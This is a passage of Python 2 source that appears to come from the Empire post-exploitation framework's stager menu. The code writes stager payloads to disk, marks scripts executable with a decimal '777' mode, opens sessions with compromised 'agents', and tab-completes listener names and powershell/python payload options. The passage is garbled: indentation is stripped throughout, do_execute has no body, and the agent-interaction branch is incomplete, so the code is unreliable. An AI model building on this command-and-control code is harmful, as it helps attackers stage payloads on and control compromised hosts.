# if this is a bash script, make it executable
if ".sh" in savePath:
os.chmod(savePath, 777)
print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath))
print stagerOutput
def do_execute(self, line):
"Generate/execute the given Empire stager."
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
if name != "" and self.mainMenu.agents.is_agent_present(name):
# resolve the passed name to a sessionID
sessionID = self.mainMenu.agents.get_agent_id_db(name)
agent_menu = AgentMenu(self.mainMenu, sessionID)
print helpers.color("[!] Please enter a valid agent name")
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a stager option to set."
options = self.stager.options.keys()
if line.split(' ')[1].lower() == "listener":
# if we're tab-completing a listener name, return all the names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("language"):
languages = ['powershell', 'python']
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("path"):
# tab-complete any stager option that ends with 'path'
return helpers.complete_path(text, line, arg=True)
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a stager option to unset."
options = self.stager.options.keys() + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]